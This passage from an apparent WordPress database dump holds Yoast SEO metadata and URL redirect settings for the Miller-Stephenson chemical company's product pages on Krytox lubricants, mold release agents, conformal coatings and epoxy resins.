Vacuum Pump Greases & Oils";s:10:"wpseo_desc";s:133:"Low pressures. Extremely high or low temperatures. Hostile environments. Whatever special needs your system might have, Krytox works.";s:13:"wpseo_focuskw";s:10:"Krytox VPF";s:13:"wpseo_linkdex";s:2:"76";s:19:"wpseo_content_score";s:2:"30";}i:36;a:5:{s:11:"wpseo_title";s:59:"Krytox NRT Reactive Gases Oxygen Safe Application Lubricant";s:10:"wpseo_desc";s:150:"Krytox NRT series offer the ideal solution to improve the safety and reduce the complexity of lubricating your oxygen and reactive chemical equipment.";s:13:"wpseo_focuskw";s:10:"Krytox NRT";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:131;a:5:{s:11:"wpseo_title";s:52:"Krytox NRT PLSS NSF H-1 Rated Reactive Gas Lubricant";s:10:"wpseo_desc";s:129:"Krytox NRT PLSS oils and greases are designed specifically for critical oxygen service equipment, where failure is not an option.";s:13:"wpseo_focuskw";s:15:"Krytox NRT PLSS";s:13:"wpseo_linkdex";s:2:"40";s:19:"wpseo_content_score";s:2:"30";}i:130;a:5:{s:11:"wpseo_title";s:61:"Krytox NRT 8900 Critical Oxygen Service Equipment Lubrication";s:10:"wpseo_desc";s:142:"Krytox NRT 8900 greases are designed specifically for critical oxygen service equipment, where failure is not an option. NRT oils and greases.";s:13:"wpseo_focuskw";s:15:"Krytox NRT 8900";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:34;a:5:{s:11:"wpseo_title";s:61:"Krytox GPL Series High Performance PFPE / PTFE Greases & Oils";s:10:"wpseo_desc";s:150:"Krytox GPL are chemically inert and safe for use around most chemicals, these lubricants are nonflammable and are also safe for use in oxygen service.";s:13:"wpseo_focuskw";s:10:"Krytox GPL";s:13:"wpseo_linkdex";s:2:"86";s:19:"wpseo_content_score";s:2:"30";}i:96;a:5:{s:11:"wpseo_title";s:46:"Krytox GPL 200-207 General Purpose PTFE Grease";s:10:"wpseo_desc";s:158:"Krytox GPL 200-207 greases are white buttery greases with all of the same properties as the Krytox GPL 100–107 oils that they are made from, in grease form.";s:13:"wpseo_focuskw";s:18:"Krytox GPL 200-207";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:8;a:10:{s:11:"wpseo_title";s:63:"Mold Release Agents | Semi-Permanent & PTFE | Miller-Stephenson";s:10:"wpseo_desc";s:148:"Miller-Stephenson offers high-performance mold release agents for industrial manufacturing and is back by over 40 years of research and development.";s:13:"wpseo_focuskw";s:19:"Mold Release Agents";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";s:21:"wpseo_opengraph-title";s:40:"Miller-Stephenson Release Agents Catalog";s:27:"wpseo_opengraph-description";s:219:"Miller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.";s:21:"wpseo_opengraph-image";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/release-agents-products.jpg";s:19:"wpseo_twitter-title";s:40:"Miller-Stephenson Release Agents Catalog";s:25:"wpseo_twitter-description";s:94:"Miller-Stephenson mold release agents are backed by over 40 years of research and development.";}i:21;a:5:{s:11:"wpseo_title";s:60:"Semi-Permanent Release Agents | ReleaSys | Miller-Stephenson";s:10:"wpseo_desc";s:141:"ReleaSys is Miller-Stephenson\'s most advanced, semi-permanent release agents which maximizes releases per application and cost-effectiveness.";s:13:"wpseo_focuskw";s:29:"Semi-Permanent Release Agents";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:35;a:5:{s:11:"wpseo_title";s:50:"Krytox Aerospace & Aviation MIL PRF Greases & Oils";s:10:"wpseo_desc";s:152:"Krytox aerospace lubricants were initially developed by in the early 1960s specifically for the precise and demanding lubrication needs of the industry.";s:13:"wpseo_focuskw";s:16:"Krytox Aerospace";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:123;a:5:{s:11:"wpseo_title";s:51:"Krytox XHT-BD High Temperature Grease | Non-Melting";s:10:"wpseo_desc";s:139:"Krytox XHT-BD series are special extreme high temperature greases with low oil evaporation that are thickened with a non-melting thickener.";s:13:"wpseo_focuskw";s:13:"Krytox XHT-BD";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:124;a:5:{s:11:"wpseo_title";s:62:"Krytox XHT-S Special High Temperature Greases - PTFE Thickened";s:10:"wpseo_desc";s:149:"The Krytox XHT-S series greases are an extension of the Krytox GPL 240 series and Krytox GPL 20X series, but are designed to give higher performance.";s:13:"wpseo_focuskw";s:12:"Krytox XHT-S";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:168;a:5:{s:11:"wpseo_title";s:53:"Krytox XP Bearing Oils & Greases | High - Performance";s:10:"wpseo_desc";s:144:"Krytox XP products are perfluoropolyether (PFPE) oils and greases use solid additives for anti-rust, anti-wear, or extreme pressure performance.";s:13:"wpseo_focuskw";s:9:"Krytox XP";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:160;a:5:{s:11:"wpseo_title";s:58:"Krytox FPG Series - High Performance PTFE Thickened Grease";s:10:"wpseo_desc";s:150:"Krytox FPG is a smooth, buttery white grease. It is a perfluoropolyether (PFPE)-based grease thickened with a special high performance PTFE thickener.";s:13:"wpseo_focuskw";s:10:"Krytox FPG";s:13:"wpseo_linkdex";s:2:"44";s:19:"wpseo_content_score";s:2:"30";}i:16;a:5:{s:11:"wpseo_title";s:57:"PTFE Release Agents | MS-122 & MS-143 | Miller-Stephenson";s:10:"wpseo_desc";s:151:"Miller-Stephenson\'s MS-122/143 series offers high performance PTFE release agents which imparts exceptional mold release action and cost-effectiveness.";s:13:"wpseo_focuskw";s:19:"PTFE Release Agents";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:11;a:5:{s:11:"wpseo_title";s:62:"Conformal Coating | Circuit Board Coatings | Miller-Stephenson";s:10:"wpseo_desc";s:145:"Miller-Stephenson manufactures high-performance, specialized Conformal Coating systems for all commercial and military electronic specifications.";s:13:"wpseo_focuskw";s:17:"Conformal Coating";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:29;a:5:{s:11:"wpseo_title";s:66:"Acrylic Conformal Coating | Electronic Barrier | Miller-Stephenson";s:10:"wpseo_desc";s:152:"Acrylic conformal coating is a tough, abrasion resistant coating providing excellent electrical insulation against high voltage arcing and corona shorts";s:13:"wpseo_focuskw";s:25:"Acrylic Conformal Coating";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"60";}i:27;a:5:{s:11:"wpseo_title";s:65:"Urethane Conformal Coating | Protective Films | MIller-Stephenson";s:10:"wpseo_desc";s:153:"Miller-Stephenson Urethane Conformal Coating provide superior toughness, abrasion resistance and excellent protection from humidity and organic solvents.";s:13:"wpseo_focuskw";s:26:"Urethane Conformal Coating";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:93;a:5:{s:11:"wpseo_title";s:62:"EPON Epoxy Resins | EPIKURE Curing Agents | Heloxy Modifiers |";s:10:"wpseo_desc";s:149:"Miller-Stephenson offers Hexion EPON Epoxy Resins, EPONEX UV-resistant Resins, EPIREZ Waterborne Resins, EPIKURE Curing Agents, and HELOXY Modifiers.";s:13:"wpseo_focuskw";s:12:"Epoxy Resins";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:28;a:5:{s:11:"wpseo_title";s:63:"Silicone Conformal Coating | PCB Protection | Miller-Stephenson";s:10:"wpseo_desc";s:156:"Silicone Conformal Coating provides excellent moisture, fungal, temperature resistance with good dielectric properties in a flexible solder-through coating.";s:13:"wpseo_focuskw";s:26:"Silicone Conformal Coating";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"60";}i:95;a:5:{s:11:"wpseo_title";s:63:"EPON Epoxy Resin | Epon Resin | Hexion Epoxy Resin | Composites";s:10:"wpseo_desc";s:139:"EPON epoxy resin systems are industry-leading resins designed to provide high performance base properties to modern composite formulations.";s:13:"wpseo_focuskw";s:16:"EPON Epoxy Resin";s:13:"wpseo_linkdex";s:2:"95";s:19:"wpseo_content_score";s:2:"30";}i:127;a:5:{s:11:"wpseo_title";s:69:"Epikure Curing Agents | Hexion Curing Agent | Curing Agents for Epoxy";s:10:"wpseo_desc";s:146:"EPIKURE curing agents offer high performance benefits to coatings, adhesives, potting, encapsulating, molding and fiber-reinforced plastics (FRP).";s:13:"wpseo_focuskw";s:21:"Epikure Curing Agents";s:13:"wpseo_linkdex";s:2:"96";s:19:"wpseo_content_score";s:2:"30";}i:20;a:5:{s:11:"wpseo_title";s:70:"High-Temp Release Agents | Boron Nitride | High-Temperature Composites";s:10:"wpseo_desc";s:148:"Miller-Stephenson High-Temp Release Agents offers effective release for molding operations which operate at temperatures exceeding 1562°F / 842°C.";s:13:"wpseo_focuskw";s:24:"High-Temp Release Agents";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:128;a:5:{s:11:"wpseo_title";s:66:"EPI-REZ Epoxy Resins | Waterborne Epoxy Resins | Miller-Stephenson";s:10:"wpseo_desc";s:150:"Hexion\'s EPI-REZ Epoxy Resins are Waterborne Resins systems that allow formulator to reduce VOC while maintaining performance and structural strength.";s:13:"wpseo_focuskw";s:20:"EPI-REZ Epoxy Resins";s:13:"wpseo_linkdex";s:2:"96";s:19:"wpseo_content_score";s:2:"30";}i:129;a:5:{s:11:"wpseo_title";s:71:"Heloxy Epoxy Functional Modifiers | Epoxy Modifiers | Miller-Stephenson";s:10:"wpseo_desc";s:155:"Heloxy Epoxy Functional Modifiers offers formulators the ability to choose between functional glycidyl ethers and flexibilizers for their formulating needs";s:13:"wpseo_focuskw";s:33:"Heloxy Epoxy Functional Modifiers";s:13:"wpseo_linkdex";s:2:"96";s:19:"wpseo_content_score";s:2:"30";}i:155;a:5:{s:11:"wpseo_title";s:64:"EPONEX Resins | UV-resistant Cycloaliphatic Epoxy Resin | Hexion";s:10:"wpseo_desc";s:145:"EPONEX Resins are unique low viscosity epoxy resins designed to have improved performance compared to conventional bisphenol-A (BPA) type resins.";s:13:"wpseo_focuskw";s:13:"EPONEX Resins";s:13:"wpseo_linkdex";s:2:"90";s:19:"wpseo_content_score";s:2:"30";}i:143;a:2:{s:13:"wpseo_linkdex";s:2:"22";s:19:"wpseo_content_score";s:2:"30";}i:261;a:2:{s:13:"wpseo_linkdex";s:2:"15";s:19:"wpseo_content_score";s:2:"30";}i:325;a:5:{s:11:"wpseo_title";s:63:"PTFE Dry Film Lubricants | Teflon Lubricants | PTFE Lubricant |";s:10:"wpseo_desc";s:155:"PTFE Dry film Lubricants utilize discrete Teflon particles providing dry film lubrication under all extreme conditions including temperature, pressure, etc";s:13:"wpseo_focuskw";s:24:"PTFE Dry film Lubricants";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:515;a:4:{s:11:"wpseo_title";s:57:"Krytox Sootblower Gearbox Grease | Performance Lubricants";s:10:"wpseo_desc";s:154:"Krytox Sootblower greases provide an opportunity to reduce maintenance requirements and improve equipment reliability and safety of your Sootblower fleet.";s:13:"wpseo_linkdex";s:2:"29";s:19:"wpseo_content_score";s:2:"30";}i:517;a:2:{s:13:"wpseo_linkdex";s:1:"9";s:19:"wpseo_content_score";s:2:"30";}i:341;a:9:{s:11:"wpseo_title";s:57:"Flux Remover Catalog - Miller-Stephenson Chemical Company";s:10:"wpseo_desc";s:113:"Miller-Stephenson Flux Remover Catalog offering. These products are manufactured by us in our factory in the U.S.";s:13:"wpseo_focuskw";s:20:"Flux Remover Catalog";s:13:"wpseo_linkdex";s:2:"40";s:19:"wpseo_content_score";s:2:"30";s:21:"wpseo_opengraph-title";s:42:"Flux Removers - Miller-Stephenson Chemical";s:27:"wpseo_opengraph-description";s:140:"An, economical and superior solvent for flux removal and heavy duty cleaning. Suitable for removing oil, ionic salts and particulate matter.";s:21:"wpseo_opengraph-image";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/12/shutterstock_543794323.jpg";s:25:"wpseo_twitter-description";s:140:"An, economical and superior solvent for flux removal and heavy duty cleaning. Suitable for removing oil, ionic salts and particulate matter.";}i:524;a:4:{s:11:"wpseo_title";s:65:"Industrial Wire Coatings | Advanced Chemistry | Miller-Stephenson";s:10:"wpseo_desc";s:135:"Miller-Stephenson provides sophisticated, cost-effective, and unique industrial wire coatings for numerous applications and industries.";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:522;a:2:{s:13:"wpseo_linkdex";s:2:"20";s:19:"wpseo_content_score";s:2:"30";}i:523;a:4:{s:11:"wpseo_title";s:66:"Medical Wire Coatings | Fluoropolymer Coatings | Miller-Stephenson";s:10:"wpseo_desc";s:149:"Miller-Stephenson provides the medical market with the most durable, robust fluoropolymer medical wire coatings for all wire and device applications.";s:13:"wpseo_linkdex";s:2:"97";s:19:"wpseo_content_score";s:2:"30";}i:521;a:2:{s:13:"wpseo_linkdex";s:2:"59";s:19:"wpseo_content_score";s:2:"30";}i:526;a:5:{s:11:"wpseo_title";s:76:"Injection Molding | ReleaSys Semi-Permanent Mold Release | Miller-Stephenson";s:10:"wpseo_desc";s:131:"ReleaSys mold release agents, ideally suited for injection molding operations offering superior durability and higher productivity.";s:13:"wpseo_focuskw";s:17:"Injection Molding";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:525;a:2:{s:13:"wpseo_linkdex";s:2:"59";s:19:"wpseo_content_score";s:2:"30";}i:527;a:5:{s:11:"wpseo_title";s:75:"PTFE Aerosol Spray | MS-122 PTFE | Miller-Stephenson Mold Release Solutions";s:10:"wpseo_desc";s:152:"MS-122 PTFE aerosol spray systems from Miller-Stephenson has been providing robust and advanced technical solutions for the molding industry since 1955.";s:13:"wpseo_focuskw";s:18:"PTFE Aerosol Spray";s:13:"wpseo_linkdex";s:2:"70";s:19:"wpseo_content_score";s:2:"30";}i:528;a:4:{s:11:"wpseo_title";s:72:"PTFE Bulk Iiquid | PTFE Mold Release Agents | MS-143 | MIller-Stephenson";s:10:"wpseo_desc";s:142:"Miller-Stephenson\'s MS-143 bulk PTFE systems are designed to provide the highest utility and applicability across a broad range of substrates.";s:13:"wpseo_linkdex";s:2:"67";s:19:"wpseo_content_score";s:2:"30";}i:529;a:5:{s:11:"wpseo_title";s:69:"Specialty Mold Release | Concrete Mold Release | Rotational Molding |";s:10:"wpseo_desc";s:156:"Miller-Stephenson specialty mold release agents have been meticulously refined for specific mold operations such as concrete release, rotational molding....";s:13:"wpseo_focuskw";s:22:"specialty mold release";s:13:"wpseo_linkdex";s:2:"74";s:19:"wpseo_content_score";s:2:"30";}i:530;a:2:{s:13:"wpseo_linkdex";s:2:"15";s:19:"wpseo_content_score";s:2:"30";}i:31;a:5:{s:11:"wpseo_title";s:73:"Conformal Coating Stripping Agent | Safe and Reliable | Miller-Stephenson";s:10:"wpseo_desc";s:141:"Miller-Stephenson\'s Conformal Coating Stripping Agent is the ideal solvent to quickly and safely remove the most stubborn conformal coatings.";s:13:"wpseo_focuskw";s:33:"Conformal Coating Stripping Agent";s:13:"wpseo_linkdex";s:2:"54";s:19:"wpseo_content_score";s:2:"60";}}s:8:"category";a:3:{i:259;a:5:{s:11:"wpseo_title";s:51:"Vazo FRS Free Radical Initiators: Benefits and Uses";s:10:"wpseo_desc";s:155:"Vazo FRS is a product line of diazo-compounds designed to be used as radical initiators for a variety of polymerization and other uses. Click to read more.";s:13:"wpseo_focuskw";s:8:"Vazo FRS";s:13:"wpseo_linkdex";s:2:"40";s:19:"wpseo_content_score";s:2:"30";}i:117;a:5:{s:11:"wpseo_title";s:64:"Krytox™ Lubricant Articles - Industrial PTFE / PFPE Lubricants";s:10:"wpseo_desc";s:154:"Krytox articles designed to meet the needs of ever changing and demanding industries across the world. Krytox lubricants are the premier choice lubricant.";s:13:"wpseo_focuskw";s:15:"Krytox Articles";s:13:"wpseo_linkdex";s:2:"42";s:19:"wpseo_content_score";s:2:"30";}i:1;a:2:{s:13:"wpseo_linkdex";s:2:"15";s:19:"wpseo_content_score";s:2:"30";}}}', 'yes'); 
INSERT INTO `wp_options` VALUES (24425, 'wpseo_sitemap_product_cat_cache_validator', '4LgKc', 'no'); 
INSERT INTO `wp_options` VALUES (24440, 'wpseo_sitemap_product_tag_cache_validator', '4F3Yf', 'no'); 
INSERT INTO `wp_options` VALUES (24441, 'wpseo_sitemap_product_cache_validator', '4F3Wz', 'no'); 
INSERT INTO `wp_options` VALUES (24442, 'wpseo_sitemap_product_type_cache_validator', '4F3X9', 'no'); 
INSERT INTO `wp_options` VALUES (24483, 'options-404-redirect-group', 'a:2:{s:16:"p404_redirect_to";s:33:"https://www.miller-stephenson.com";s:11:"p404_status";s:1:"1";}', 'yes'); 
INSERT INTO `wp_options` VALUES (24492, 'wpseo-premium-redirects-base', 'a:402:{i:0;a:4:{s:6:"origin";s:10:"index.html";s:3:"url";s:0:"";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:1;a:4:{s:6:"origin";s:43:"miller-stephenson.com/miller/conformal.html";s:3:"url";s:46:"miller-stephenson/chemicals/conformal-coatings";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:2;a:4:{s:6:"origin";s:19:"miller/support.html";s:3:"url";s:7:"contact";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:4;a:4:{s:6:"origin";s:26:"miller/military_specs.html";s:3:"url";s:0:"";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:5;a:4:{s:6:"origin";s:28:"miller/GPL_oils_greases.html";s:3:"url";s:66:"chemicals/krytox-tribosys-finish-line/krytox-lubricants/gpl-series";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:6;a:4:{s:6:"origin";s:40:"miller-stephenson.com/miller/krytox.html";s:3:"url";s:59:"miller-stephenson.com/chemicals/krytox-tribosys-finish-line";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:7;a:4:{s:6:"origin";s:27:"miller/ptfe_lubricants.html";s:3:"url";s:70:"chemicals/krytox-tribosys-finish-line/tribosys/ptfe-dryfilm-lubricants";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:8;a:4:{s:6:"origin";s:47:"miller-stephenson.com/miller/adhesive_kits.html";s:3:"url";s:51:"miller-stephenson.com/chemicals/epoxy-resin-systems";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:9;a:4:{s:6:"origin";s:33:"miller/food_grade_lubricants.html";s:3:"url";s:0:"";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:10;a:4:{s:6:"origin";s:23:"miller/fluoroguard.html";s:3:"url";s:66:"chemicals/krytox-tribosys-finish-line/krytox-lubricants/vpf-krytox";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:11;a:4:{s:6:"origin";s:25:"miller/vazo_overview.html";s:3:"url";s:14:"chemicals/vazo";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:12;a:4:{s:6:"origin";s:26:"miller/RNT_lubricants.html";s:3:"url";s:66:"chemicals/krytox-tribosys-finish-line/krytox-lubricants/nrt-series";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:13;a:4:{s:6:"origin";s:26:"miller/release_agents.html";s:3:"url";s:24:"chemicals/release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:14;a:4:{s:6:"origin";s:20:"miller/solvents.html";s:3:"url";s:18:"chemicals/solvents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:15;a:4:{s:6:"origin";s:21:"miller/aerospace.html";s:3:"url";s:81:"chemicals/krytox-tribosys-finish-line/krytox-lubricants/aerospace-aviation-series";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:16;a:4:{s:6:"origin";s:29:"miller/solvents_cleaners.html";s:3:"url";s:26:"chemicals/solvents/solvsys";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:17;a:4:{s:6:"origin";s:39:"miller/media_head_plastic_cleaners.html";s:3:"url";s:35:"product/plastic-glass-metal-cleaner";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:18;a:4:{s:6:"origin";s:32:"miller/connector_lubricants.html";s:3:"url";s:67:"chemicals/krytox-tribosys-finish-line/tribosys/connector-lubricants";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:19;a:4:{s:6:"origin";s:36:"miller/fluoroextreme_lubricants.html";s:3:"url";s:64:"chemicals/krytox-tribosys-finish-line/tribosys/pfpe-oils-greases";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:20;a:4:{s:6:"origin";s:21:"miller/conformal.html";s:3:"url";s:28:"chemicals/conformal-coatings";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:21;a:4:{s:6:"origin";s:29:"miller/conformal_coating.html";s:3:"url";s:28:"chemicals/conformal-coatings";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:22;a:4:{s:6:"origin";s:25:"miller/XP_lubricants.html";s:3:"url";s:69:"chemicals/krytox-tribosys-finish-line/krytox-lubricants/krytox-xp-oil";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:23;a:4:{s:6:"origin";s:32:"miller/other_release_agents.html";s:3:"url";s:24:"chemicals/release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:24;a:4:{s:6:"origin";s:29:"miller/others_lubricants.html";s:3:"url";s:37:"chemicals/krytox-tribosys-finish-line";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:25;a:4:{s:6:"origin";s:20:"miller/Releases.html";s:3:"url";s:39:"chemicals/release-agents/semi-permanent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:26;a:4:{s:6:"origin";s:27:"miller/npb_replacement.html";s:3:"url";s:35:"chemicals/solvents/vertrel-solvents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:29;a:4:{s:6:"origin";s:13:"product/240ac";s:3:"url";s:20:"product/krytox-240ac";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:31;a:4:{s:6:"origin";s:13:"product/240ab";s:3:"url";s:20:"product/krytox-240ab";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:32;a:4:{s:6:"origin";s:13:"product/240aa";s:3:"url";s:20:"product/krytox-240aa";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:33;a:4:{s:6:"origin";s:13:"product/250ac";s:3:"url";s:20:"product/krytox-250ac";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:34;a:4:{s:6:"origin";s:13:"product/250ad";s:3:"url";s:20:"product/krytox-250ad";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:54;a:4:{s:6:"origin";s:37:"chemicals/krytox-tribosys-finish-line";s:3:"url";s:43:"chemicals/krytox-tribosys-teflon-lubricants";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:56;a:4:{s:6:"origin";s:52:"chemicals/krytox-tribosys-teflon-lubricants/tribosys";s:3:"url";s:63:"chemicals/krytox-tribosys-teflon-lubricants/tribosys-lubricants";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:57;a:4:{s:6:"origin";s:55:"chemicals/krytox-tribosys-teflon-lubricants/finish-line";s:3:"url";s:61:"chemicals/krytox-tribosys-teflon-lubricants/teflon-lubricants";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:59;a:4:{s:6:"origin";s:84:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/gpl-series/gpl-greases";s:3:"url";s:91:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/gpl-series/krytox-gpl-greases";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:68;a:4:{s:6:"origin";s:13:"product/240ad";s:3:"url";s:20:"product/krytox-240ad";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:69;a:4:{s:6:"origin";s:45:"introducing-releasys-our-newest-release-agent";s:3:"url";s:22:"releasys-release-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:70;a:4:{s:6:"origin";s:125:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aerospace-aviation-series/aerospace-aviation-greases/240-series";s:3:"url";s:132:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aerospace-aviation-series/aerospace-aviation-greases/krytox-240-series";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:71;a:4:{s:6:"origin";s:81:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/gpl-series/gpl-oils";s:3:"url";s:88:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/gpl-series/krytox-gpl-oils";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:72;a:4:{s:6:"origin";s:114:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aerospace-aviation-series/aerospace-aviation-greases";s:3:"url";s:121:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aerospace-aviation-series/krytox-aerospace-aviation-greases";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:73;a:4:{s:6:"origin";s:132:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aerospace-aviation-series/krytox-aerospace-aviation-greases/250-series";s:3:"url";s:139:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aerospace-aviation-series/krytox-aerospace-aviation-greases/krytox-250-series";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:74;a:4:{s:6:"origin";s:132:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aerospace-aviation-series/krytox-aerospace-aviation-greases/283-series";s:3:"url";s:139:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aerospace-aviation-series/krytox-aerospace-aviation-greases/krytox-283-series";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:79;a:4:{s:6:"origin";s:103:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/gpl-series/krytox-gpl-greases/gpl-220-227";s:3:"url";s:110:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/gpl-series/krytox-gpl-greases/krytox-gpl-220-227";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:80;a:4:{s:6:"origin";s:92:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/electronic-grade-krytox-grease";s:3:"url";s:99:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-electronic-grade-krytox-grease";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:83;a:4:{s:6:"origin";s:12:"millerkrytox";s:3:"url";s:27:"krytox-application-overview";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:85;a:4:{s:6:"origin";s:87:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/ts4-krytox-thread-sealant";s:3:"url";s:72:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-ts4";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:87;a:4:{s:6:"origin";s:11:"krytox.html";s:3:"url";s:27:"krytox-lubrication-overview";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:88;a:4:{s:6:"origin";s:18:"miller/krytox.html";s:3:"url";s:6:"krytox";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:89;a:4:{s:6:"origin";s:35:"chemicals/solvents/vertrel-solvents";s:3:"url";s:26:"chemicals/solvents/vertrel";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:90;a:4:{s:6:"origin";s:45:"vazo-free-radical-initiator-benefits-and-uses";s:3:"url";s:27:"vazo-free-radical-initiator";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:91;a:4:{s:6:"origin";s:79:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/xht-series-krytox";s:3:"url";s:72:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-xht";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:92;a:4:{s:6:"origin";s:84:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-xht/xht-greases";s:3:"url";s:90:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:93;a:4:{s:6:"origin";s:104:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/xht-ac-series";s:3:"url";s:104:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:94;a:4:{s:6:"origin";s:63:"why-vertrel-specialty-fluids-are-a-suitable-replacement-for-npb";s:3:"url";s:14:"vertrel-fluids";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:95;a:4:{s:6:"origin";s:72:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aut-series";s:3:"url";s:79:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-aut-series";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:100;a:4:{s:6:"origin";s:72:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/lvp-series";s:3:"url";s:76:"chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-lvp-vpf";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:102;a:4:{s:6:"origin";s:17:"product/1506-copy";s:3:"url";s:23:"product/krytox-vpf-1506";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:103;a:4:{s:6:"origin";s:12:"product/1514";s:3:"url";s:23:"product/krytox-vpf-1514";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:104;a:4:{s:6:"origin";s:12:"product/1525";s:3:"url";